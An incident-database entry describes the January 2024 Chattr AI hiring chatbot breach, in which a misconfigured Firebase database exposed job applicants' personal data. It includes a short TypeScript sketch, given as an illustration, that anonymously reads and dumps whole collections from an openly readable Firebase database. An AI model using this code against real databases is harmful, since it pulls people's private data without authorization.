AI hiring chatbot hack violates job applicants' privacy
Occurred: January 2024
A group of hackers gained access to AI recruitment chatbot Chattr, revealing sensitive information about job applicants, fast food franchises, and Chattr itself.
Pseudonymous hacker MRBruh and others discovered that an incorrect Firebase configuration had inadvertently exposed data about Chattr, its customers - specifically Chick-fil-A and Subway - and their job applicants, including personal names, telephone numbers, email addresses, passwords, and messages.
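The class of exposure described here typically stems from Firebase security rules that permit unauthenticated reads. The sketch below illustrates, under assumed project details, how any visitor could pull records from such a database using the standard Firebase web SDK; the database URL, API key, and data path are hypothetical and do not reflect Chattr's actual setup.

```typescript
// Hypothetical sketch: reading an openly readable Firebase Realtime Database
// without credentials. All identifiers below are illustrative assumptions.
import { initializeApp } from "firebase/app";
import { getDatabase, ref, get } from "firebase/database";

// A Firebase web app's config is shipped publicly in client bundles;
// protection is supposed to come from server-side security rules.
const app = initializeApp({
  apiKey: "AIza...",                                      // public by design
  databaseURL: "https://example-project.firebaseio.com",  // hypothetical URL
});

const db = getDatabase(app);

// If the rules allow unauthenticated reads (e.g. ".read": true),
// an anonymous client can dump entire collections, applicant records included.
async function dumpPath(path: string): Promise<void> {
  const snapshot = await get(ref(db, path));
  if (snapshot.exists()) {
    console.log(JSON.stringify(snapshot.val(), null, 2));
  }
}

dumpPath("/applicants"); // hypothetical path
```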
The hack also revealed how Chattr's system worked, including that the AI appeared able to accept or reject job applicants automatically. Chattr secured its system after the hack was made public, though it did not publicly acknowledge the incident.
The incident prompted suggestions that Chattr is likely one of many AI companies to have overlooked security and data privacy in the rush to get their products to market.
Operator: Applebee's, Arby's, Chick-fil-A, Dunkin' Donuts, IHOP, KFC, Shoney's, Subway, Taco Bell, Target, Wendy's
Developer: Chattr
Country: USA
Sector: Business/professional services; Food/food services
Purpose: Recruit employees
Technology: Chatbot; NLP/text analysis; Neural network; Deep learning; Machine learning; Reinforcement learning
Issue: Confidentiality; Privacy; Security
Page info
Type: Incident
Published: January 2024